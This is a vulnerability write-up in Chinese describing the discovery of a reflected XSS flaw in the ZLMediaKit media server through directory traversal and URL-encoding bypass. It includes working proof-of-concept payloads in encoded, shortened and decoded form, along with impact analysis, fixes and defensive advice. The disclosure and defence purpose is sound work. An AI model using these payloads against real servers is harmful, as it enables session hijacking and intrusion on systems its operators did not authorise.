ZLMediaKit XSS漏洞挖掘与分析报告

1. 漏洞概述

本报告详细记录了在ZLMediaKit中发现的一个反射型跨站脚本(XSS)漏洞的挖掘过程。该漏洞允许攻击者通过精心构造的URL路径注入恶意JavaScript代码，当管理员或其他用户访问该链接时，代码将在其浏览器环境中执行。

2. 漏洞发现环境

• 目标系统：ZLMediaKit流媒体服务器
• 发现场景：安全检测过程中发现的目录索引服务
• 测试工具：Burp Suite抓包工具

3. 信息收集阶段

3.1 服务识别

通过访问目标端口发现类似目录索引的服务，经Burp抓包分析确认服务类型为ZLMediaKit。

3.2 历史漏洞调研

通过CVE数据库搜索发现ZLMediaKit存在以下历史漏洞：

• 目录遍历攻击漏洞
• DDoS相关漏洞

4. 漏洞挖掘过程

4.1 初始测试

1. 尝试输入随机字符串(asdasffda)测试错误处理机制
2. 观察响应内容发现存在回显

4.2 XSS初步尝试

构造基本XSS测试payload：

<h1>alert(1);<h1>

测试失败，因为访问不存在的页面会跳转到404页面。

4.3 目录穿越测试

尝试访问系统文件路径：

/.etc/passwd

发现即使文件不存在，路径内容也会在响应中回显。

4.4 组合攻击思路

结合目录穿越和XSS构造payload：

/.etc/passwd/</h1>alert(1);<h1>

但直接访问时..被GET请求处理掉，导致失败。

4.5 URL编码绕过

使用Burp Suite对payload进行URL编码：

%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%2f%3c%2f%68%31%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%3c%68%31%3e

成功触发XSS漏洞。

4.6 Payload精简

最终精简的有效payload：

/../alert(1);%2f%2e%2e%2f%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e

5. 漏洞影响分析

5.1 影响范围

• 全版本ZLMediaKit
• 前置条件：系统内部必须存在文件

5.2 潜在危害

1. 窃取管理员会话cookie
2. 执行任意前端操作
3. 发起针对内部网络的进一步攻击
4. 植入恶意脚本长期控制

6. 漏洞修复建议

1. 对所有用户输入进行严格的HTML编码
2. 实现内容安全策略(CSP)
3. 限制特殊字符在路径中的使用
4. 对错误页面进行统一处理，避免原始输入回显

7. 漏洞提交

该漏洞已提交至CVE机构，目前处于未公开状态。

8. 防御措施

对于使用ZLMediaKit的组织，建议：

1. 及时关注官方安全更新
2. 部署Web应用防火墙(WAF)规则拦截此类攻击
3. 限制目录索引功能的公开访问
4. 实施严格的输入验证机制

附录：关键Payload示例

原始URL编码Payload

%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64%2f%3c%2f%68%31%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%3c%68%31%3e

精简Payload

/../alert(1);%2f%2e%2e%2f%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e

解码后示例

/../../../../../../../../etc/passwd/</h1><script>alert(1);</script><h1>